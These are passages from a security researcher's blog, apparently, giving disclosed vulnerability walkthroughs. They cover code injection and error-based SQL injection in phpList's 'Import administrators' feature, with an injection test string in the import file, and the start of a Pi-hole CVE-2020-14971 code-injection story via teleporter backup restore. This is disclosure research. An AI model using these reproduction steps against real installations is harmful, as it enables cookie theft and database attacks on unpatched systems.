<!--[if !supportLists]--><span style="font-family: inherit; font-size: large;"><span style="mso-list: Ignore;">·<span style="font-stretch: normal; font-style: normal; font-variant-caps: normal; font-weight: normal; line-height: normal;"> </span></span><!--[endif]--><span lang="EN-US"><a href="https://discuss.phplist.org/t/phplist-3-5-5-has-been-released/6377" style="color: purple; text-decoration: underline;"><span lang="EN-US"><span lang="EN-US">https://discuss.phplist.org/t/phplist-3-5-5-has-been-released/6377</span></span></a></span><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit; font-size: large;"><span style="mso-list: Ignore;">·<span style="font-stretch: normal; font-style: normal; font-variant-caps: normal; font-weight: normal; line-height: normal;"> </span></span><!--[endif]--><span lang="EN-US"><a href="https://www.phplist.org/newslist/phplist-3-5-5-release-notes/" style="color: purple; text-decoration: underline;"><span lang="EN-US"><span lang="EN-US">https://www.phplist.org/newslist/phplist-3-5-5-release-notes/</span></span></a></span><o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit; font-size: large;"><span style="mso-list: Ignore;">·<span style="font-stretch: normal; font-style: normal; font-variant-caps: normal; font-weight: normal; line-height: normal;"> </span></span><!--[endif]--><span lang="EN-US"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15072" style="color: purple; text-decoration: underline;"><span lang="EN-US"><span lang="EN-US">https://cve.mitre.org/cgi-bin/cvename.cgi<span lang="EN-US">?name=CVE-2020-15072</span></span></span></a></span></span><o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: inherit; font-size: large;"><span style="mso-list: Ignore;">·<span style="font-stretch: normal; font-style: normal; font-variant-caps: normal; font-weight: normal; line-height: normal;"> </span></span><!--[endif]--><span lang="EN-US"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15073" style="color: purple; text-decoration: underline;"><span lang="EN-US"><span lang="EN-US">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15073</span></span></a></span><o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; margin: 0in 0in 0.0001pt; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0px;">
<br /></div>
<br />
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">A walkthrough of the 2 identified vulnerabilities is given below:</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;"><br /></span></span></div>
<h2>
<b><span lang="EN-US">1.) Code Injection via "Import administrators"</span></b></h2>
<div class="MsoNormal" style="font-size: medium;">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.1) Click on "Config" then "Import administrators"</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<div class="MsoNormal" style="font-size: medium;">
<span lang="EN-US"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyPppFv3ohHM2NT1LjJ6s6I6dhOId6El8OY15d4uKYzX-bfUk0zmqTqsHTyZ97n0JivDXXM-TtNJ_NB_qf2honm_ZGUA_fRzetB2a9KfiqzLIqKmqmVw_exQu672KG-VabCZEOhnFhKl61/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="453" data-original-width="900" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhyPppFv3ohHM2NT1LjJ6s6I6dhOId6El8OY15d4uKYzX-bfUk0zmqTqsHTyZ97n0JivDXXM-TtNJ_NB_qf2honm_ZGUA_fRzetB2a9KfiqzLIqKmqmVw_exQu672KG-VabCZEOhnFhKl61/s640/1.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.2) Edit a txt file to include basic headers and test (offline) as follows:</span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwPKOi0iGqIe0P3pEW5ftErTZiITJk3xBIJmAw3O-19vuwQWYBj4GNwwQ-0oSyK-_eTQrZk2_Npa67HvarILopXHA5UDdsh7eIycClbmE4TX6wFyx4T-SZxQlOuWcDPCalcysQ2WH6C_9Q/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="132" data-original-width="898" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwPKOi0iGqIe0P3pEW5ftErTZiITJk3xBIJmAw3O-19vuwQWYBj4GNwwQ-0oSyK-_eTQrZk2_Npa67HvarILopXHA5UDdsh7eIycClbmE4TX6wFyx4T-SZxQlOuWcDPCalcysQ2WH6C_9Q/s640/2.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.3) Click on "Choose File" and select the text file.</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvh7iweU5AySwLlTQa2RuAdW2-tc-73isJPSOxgTHsmIEo6G9w4YIYOBhFSo8kHa71vEiU9Dz-Vm7P1B6JpIp-jZxSWGv0tjzDfjyIoeI4y82MFKptTb7y3LlUQVYRJuraMIOpfHdIB6Lu/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="419" data-original-width="900" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvh7iweU5AySwLlTQa2RuAdW2-tc-73isJPSOxgTHsmIEo6G9w4YIYOBhFSo8kHa71vEiU9Dz-Vm7P1B6JpIp-jZxSWGv0tjzDfjyIoeI4y82MFKptTb7y3LlUQVYRJuraMIOpfHdIB6Lu/s640/3.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.4) Click "Do Import"<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">Code Injection Triggered (not stored)</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgic4AdLYhrsjAfipXHah1jXJDYLtpkaAHa5MGpgksN81r4WA1P1vn4QGP_u2gAIM5rSOM_gwQ4EIGtOJI2RgapaXxK6eKVIXL7clJet__4k3lVGubPvxORvmYW4ttLlCPOAtyjibMJ10c9/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="311" data-original-width="900" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgic4AdLYhrsjAfipXHah1jXJDYLtpkaAHa5MGpgksN81r4WA1P1vn4QGP_u2gAIM5rSOM_gwQ4EIGtOJI2RgapaXxK6eKVIXL7clJet__4k3lVGubPvxORvmYW4ttLlCPOAtyjibMJ10c9/s640/4.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.5) Go back to "Import administrators"<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.6) Untick "Test output:"</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8b584eyAG_Cqdq1QWpLy7l_bAUfDYObDBi9IqsXzMWabTnszBBGiF-BWhyveTamgXeKp0adf6x7c4m4i8NVL1SqyWWgsK_yV2mR7fEh7y7h3PJiWZQr4u5hULLCLoK88w31Nty2qxgZgb/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="415" data-original-width="900" height="294" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8b584eyAG_Cqdq1QWpLy7l_bAUfDYObDBi9IqsXzMWabTnszBBGiF-BWhyveTamgXeKp0adf6x7c4m4i8NVL1SqyWWgsK_yV2mR7fEh7y7h3PJiWZQr4u5hULLCLoK88w31Nty2qxgZgb/s640/5.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;"><span style="font-family: inherit;">1.7) Click "Do Import" and you will get an import database error.</span><o:p></o:p></span></span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuQW9yZdQfPXYvY4o7KKWn5jZXWM0dLt8PP3yszwY8EyWpflF3X7hKTx1-a5kQWPwZATPTTKB-MF0FmkO85rbtVihefHLTB2S7GlJ4j8Urn9P2spbpQzc3dxve1POff7ICjdW3NIVirALs/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="265" data-original-width="900" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuQW9yZdQfPXYvY4o7KKWn5jZXWM0dLt8PP3yszwY8EyWpflF3X7hKTx1-a5kQWPwZATPTTKB-MF0FmkO85rbtVihefHLTB2S7GlJ4j8Urn9P2spbpQzc3dxve1POff7ICjdW3NIVirALs/s640/6.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;"><span style="font-family: inherit;">1.8) Edit the same text file and add another user as follows:</span></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYPmTAJndxRf4vcUsSPNjYZiYFYVyIQXxnz0cfMzC-y2v7vAb31Yfkoadpk4seiDbHflcZquH3WfwKtlKPQP1p_K0j1ca4t4_9V6I6U3Ke0Furh26KRswcWiXmki3QfSJuUik4-GdTlWNn/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="134" data-original-width="900" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYPmTAJndxRf4vcUsSPNjYZiYFYVyIQXxnz0cfMzC-y2v7vAb31Yfkoadpk4seiDbHflcZquH3WfwKtlKPQP1p_K0j1ca4t4_9V6I6U3Ke0Furh26KRswcWiXmki3QfSJuUik4-GdTlWNn/s640/7.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.9) Go back to "Import administrators"<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.10) Click on "Choose File" and choose the text file.<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.11) Untick "Test output:"</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0ofAb_8LvIb0FHFjkG4YLlqh0np36tRl5VoH9Amh3KWd1eg4k9DSfvCRyJr-Fj-OLeYcE7g3xpT_BN_jFiNAc2ViANCzVvsePsaWfXQ7QANTcP_a_dbp5II_SRiDtyAvCrrz1_PUTbmFC/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="413" data-original-width="900" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0ofAb_8LvIb0FHFjkG4YLlqh0np36tRl5VoH9Amh3KWd1eg4k9DSfvCRyJr-Fj-OLeYcE7g3xpT_BN_jFiNAc2ViANCzVvsePsaWfXQ7QANTcP_a_dbp5II_SRiDtyAvCrrz1_PUTbmFC/s640/8.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.12) Click "Do Import" and you will get more import database errors<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.13) Browse to "Subscribers" then "Subscriber Lists"</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPmMrCXyHEnVbqdoC87sIqCwbs_1r2OBaPy5pLCrT-8xLboYFBBziDyGk7AQzeEUeGudQDBrLbtYAmxD6T05ZTw9V8wUE2xRiXkFj0bCsLT00X9DokwYJPwnVNm16KdTaovRC2zr4CjsMR/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="461" data-original-width="898" height="328" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPmMrCXyHEnVbqdoC87sIqCwbs_1r2OBaPy5pLCrT-8xLboYFBBziDyGk7AQzeEUeGudQDBrLbtYAmxD6T05ZTw9V8wUE2xRiXkFj0bCsLT00X9DokwYJPwnVNm16KdTaovRC2zr4CjsMR/s640/9.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">1.14) Click on the first one and you'll get a "hi" popup:</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh39UGw9sJIAMhVI9OagcsCODm4um9qGrSUPnN9blTxDANPcCWGOqdlr8LCdqoesEc0NjOuvlnQlY3r2SHquH3xReuKuXw688xrUDZJHli4JqyrTOrKDBsODcZZLdgcWnhGu4VoY3nJNoOQ/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="142" data-original-width="898" height="99" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh39UGw9sJIAMhVI9OagcsCODm4um9qGrSUPnN9blTxDANPcCWGOqdlr8LCdqoesEc0NjOuvlnQlY3r2SHquH3xReuKuXw688xrUDZJHli4JqyrTOrKDBsODcZZLdgcWnhGu4VoY3nJNoOQ/s640/10.png" width="640" /></a></div>
<div class="MsoNormal">
<span style="font-family: inherit; font-size: large;"> 1.15) Go back and click on the second one and you'll get a cookie.</span><br />
<div class="MsoNormal" style="font-size: medium;">
<span lang="EN-US"><o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz07ar6YdyKGZ4K_aLR8G8M8m2SgktgbWypmtca56Qfbri2sDeRoI0L4czb8j-qkQSpW5gsDrsk9XSpILHpLIqjhPAxcI8KoKLHA5izCV-F2bRdBYBp0fGN1MeisNeSydKDVfZd3YrYEBT/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="248" data-original-width="900" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiz07ar6YdyKGZ4K_aLR8G8M8m2SgktgbWypmtca56Qfbri2sDeRoI0L4czb8j-qkQSpW5gsDrsk9XSpILHpLIqjhPAxcI8KoKLHA5izCV-F2bRdBYBp0fGN1MeisNeSydKDVfZd3YrYEBT/s640/11.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h2>
<b><span lang="EN-US">2.) Error based SQL Injection via "Import administrators"</span></b></h2>
<div class="MsoNormal" style="font-size: medium;">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">2.1) Click on "Config" then "Import administrators"<o:p></o:p></span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">2.2) Edit a txt file to include basic headers and text (offline) as follows<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">email loginname password<o:p></o:p></span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">test2@test.com "'testsql test</span><span style="font-size: small;"><o:p></o:p></span></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGbYsXFzmDJ5iWWP4c2HzU40ddbxAVCm1t7W6_lM0hJElHVusQDZKq1wPs8RUNLP1bOJouI4YK_1muJqlVjErI9Hfa9aIMrU7ujCbDfuHuY62JItMbuki0__Em9n12PHil7WeLaCfwJXkn/s1600/12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="111" data-original-width="900" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGbYsXFzmDJ5iWWP4c2HzU40ddbxAVCm1t7W6_lM0hJElHVusQDZKq1wPs8RUNLP1bOJouI4YK_1muJqlVjErI9Hfa9aIMrU7ujCbDfuHuY62JItMbuki0__Em9n12PHil7WeLaCfwJXkn/s640/12.png" width="640" /></a></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">2.3) Untick "Test output:"</span></span></div>
<div class="MsoNormal">
<span style="font-family: inherit; font-size: large;">2.4) Click on "Choose File" and choose the text file.</span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="text-align: start;"></span></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7svvZIQqFpA0aWRFPRMfR9uEp5I-l8nkHV2jxgiSOIkdBoZwsn7_3Z5_Z2IL8ShXixWTw9o43Tt_gMECC_lhT9TPX5GCNbh1LBaA2og3CHcuNEfE0MjqzQ19elWjcZydH4VfzRmOSVy3t/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="417" data-original-width="900" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7svvZIQqFpA0aWRFPRMfR9uEp5I-l8nkHV2jxgiSOIkdBoZwsn7_3Z5_Z2IL8ShXixWTw9o43Tt_gMECC_lhT9TPX5GCNbh1LBaA2og3CHcuNEfE0MjqzQ19elWjcZydH4VfzRmOSVy3t/s640/13.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
<span style="font-family: inherit; font-size: large;"> 2.5) Click "Do Import" - you'll see the Error Based SQL injection.</span><br />
<span style="font-family: inherit; font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjANUdklmTFIgLcH0aBiHikAst6LrVbZ6vqsWQ9OIqAhDTATmBrfzzufhVN2UumiMPO-eEjVC0ibcukbPP9hpewuDK_0UPBe14uRJTbGyG0KuC2KUhqdcP0Lqgg1ft6rk49IDVqU5yi8DRb/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="196" data-original-width="899" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjANUdklmTFIgLcH0aBiHikAst6LrVbZ6vqsWQ9OIqAhDTATmBrfzzufhVN2UumiMPO-eEjVC0ibcukbPP9hpewuDK_0UPBe14uRJTbGyG0KuC2KUhqdcP0Lqgg1ft6rk49IDVqU5yi8DRb/s640/14.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
<i><span style="font-family: inherit;">Creative Commons - Attribution-ShareAlike 4.0 International (CC BY-SA 4.0) - <a href="https://creativecommons.org/licenses/by-sa/4.0/">https://creativecommons.org/licenses/by-sa/4.0/</a></span></i></div>
</div>
</div>
Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-2540168616552398462.post-43135651597626966772020-06-23T11:01:00.000+02:002020-06-23T11:08:28.447+02:00Pi-hole Code Injection – CVE-2020-14971– Story Time<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">A while ago, we had an internal discussion around people working from home and the technologies/products that could be implemented and/or bought to protect home users. This was due to the implementation of the nationwide lockdown which resulted in companies being forced to change their approach entirely to having employees work from home. <o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<span style="font-family: inherit; font-size: large;">During this discussion the Pi-hole was mentioned. Pi-hole is a very popular option for the more “tech savvy” home user and generally, anyone that’s tired of being spammed with random adverts on every website. You can find more information about it here <a href="https://github.com/pi-hole/pi-hole/">https://github.com/pi-hole/pi-hole/</a>.</span><br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">Since I had a Pi-hole installed already, I decided to take a look at this beautiful piece of ad blocking software in more detail, specifically reviewing the code and logic of the application. Because it’s Opensource and available freely, this was easily accomplished by downloading and installing the latest Pi-hole (v5.0 at the time).<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">It’s worth mentioning that a lot of vulnerabilities had already been found in this software, some overlapped with findings that I had found particularly during April and May, which were rightfully allocated to the first people that reported the issues. With that being said, the Pi-hole is a popular target for researchers and adds a lot of value to people’s home and small office environments, so the more findings and fixes the better. I also wanted to focus on the latest version because of this.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><span style="font-size: large;">Initially, I had found a few critical security vulnerabilities but many had been found and fixed already and others eventually required local shell access in some form, some functionality had been changed over time, which solved those particular RCE issues too. So, I therefore looked at a few other vectors and decided to focus on one specific attack vector, which looked promising.</span><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<h2>
<b><span lang="EN-US" style="color: #353535; font-family: inherit;">Backup Functions:</span></b></h2>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">Settings.php has lots of functionality, one of which allows users to back up and restore (export and import) configurations of the Pi-hole with a limited set of files (teleporter tab). </span><br />
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglNhhw3mW08neSXNN_1PoEhIVyxrHWaqOBysJYAbU4FAWUvHg9ftssQELdj0Xpi5Hukk7-ttTCFg2BWrpJ6pvJvYyj9o4icEhZiNy9CfZ6p3qPqSrypAv7_T6DwNBIe_WxbLyU4Eo4I71P/s1600/Screen+Shot+2020-06-18+at+4.31.19+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="437" data-original-width="1006" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglNhhw3mW08neSXNN_1PoEhIVyxrHWaqOBysJYAbU4FAWUvHg9ftssQELdj0Xpi5Hukk7-ttTCFg2BWrpJ6pvJvYyj9o4icEhZiNy9CfZ6p3qPqSrypAv7_T6DwNBIe_WxbLyU4Eo4I71P/s640/Screen+Shot+2020-06-18+at+4.31.19+PM.png" width="640" /></a></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">This was interesting for me because when you export files, they are compressed in tar.gz format and saved. Upon decompression and by systematically reviewing each file that was saved, I found that there were several files which were useful and easy wins for RCE, in particular if no whitelisting and sanitising was taking place. However, those particular ones are not restored if you modify them, re-compress and upload to restore the backup.</span><br />
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg60pHTXF0c5H35b6bPbxUYnRanI4SEki9V_coimghoR5LPF8qj6CkuJebN2tLx0H41Y3ndjJSOKhMv6_0mtr4xAVWjGYu09IBiPQt8z6aUN_nqtvC8l_QFSuhQzNdP8irl0h8DCLy-9MsS/s1600/Screen+Shot+2020-06-18+at+4.35.31+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="255" data-original-width="944" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg60pHTXF0c5H35b6bPbxUYnRanI4SEki9V_coimghoR5LPF8qj6CkuJebN2tLx0H41Y3ndjJSOKhMv6_0mtr4xAVWjGYu09IBiPQt8z6aUN_nqtvC8l_QFSuhQzNdP8irl0h8DCLy-9MsS/s640/Screen+Shot+2020-06-18+at+4.35.31+PM.png" width="640" /></a></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">In this instance though, the affected files I found are dnsmasq.d configuration files and the adlist.json file. The dnsmasq.d/04-pi-hole-static-dhcp.conf file allows static DHCP leases, which link to MAC, IP and host. <o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">I modified the configuration file for dnsmasq.d initially, in which I added my own code for the host parameter. Once I did this, I recompressed the file accordingly and imported the file back in via teleporter:</span><br />
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRfq1diJZChftFHvO-VFfwNTn8GJ9_2FFUSTI6nBVPSqeDtkgEvbofaAoD1F5SKbF7HUy8PoPrtscCu8FpV6LrYJWykSG7yA07-kHwNz-roNAAt9uf5ZsL1nYFEu1h7GLsM28m5o99_p9f/s1600/Screen+Shot+2020-06-18+at+4.38.14+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="64" data-original-width="1228" height="32" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRfq1diJZChftFHvO-VFfwNTn8GJ9_2FFUSTI6nBVPSqeDtkgEvbofaAoD1F5SKbF7HUy8PoPrtscCu8FpV6LrYJWykSG7yA07-kHwNz-roNAAt9uf5ZsL1nYFEu1h7GLsM28m5o99_p9f/s640/Screen+Shot+2020-06-18+at+4.38.14+PM.png" width="640" /></a></div>
<span style="font-family: inherit;"></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><span style="font-size: large;">Upon browsing to the static DHCP leases section of the Pi-hole web interface, I could see my code was executing correctly i.e. I had found a Code Injection vulnerability. </span><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFECwnHLey4wtTVFSYh0g7Mp09T2oJBLr1auI6hYhBmvhS0OJF8JZJLZoum4ApZcpLDopUXPjYIgQ7ApjLxaTp79tr-NyIElvR11aL1s_uOHSqobD0VCk9hUOCMWNvA8m7NwWtempv8v3S/s1600/Screen+Shot+2020-06-18+at+4.39.14+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="351" data-original-width="1327" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFECwnHLey4wtTVFSYh0g7Mp09T2oJBLr1auI6hYhBmvhS0OJF8JZJLZoum4ApZcpLDopUXPjYIgQ7ApjLxaTp79tr-NyIElvR11aL1s_uOHSqobD0VCk9hUOCMWNvA8m7NwWtempv8v3S/s640/Screen+Shot+2020-06-18+at+4.39.14+PM.png" width="640" /></a></div>
<span style="color: #353535; font-family: inherit;"><br /></span>
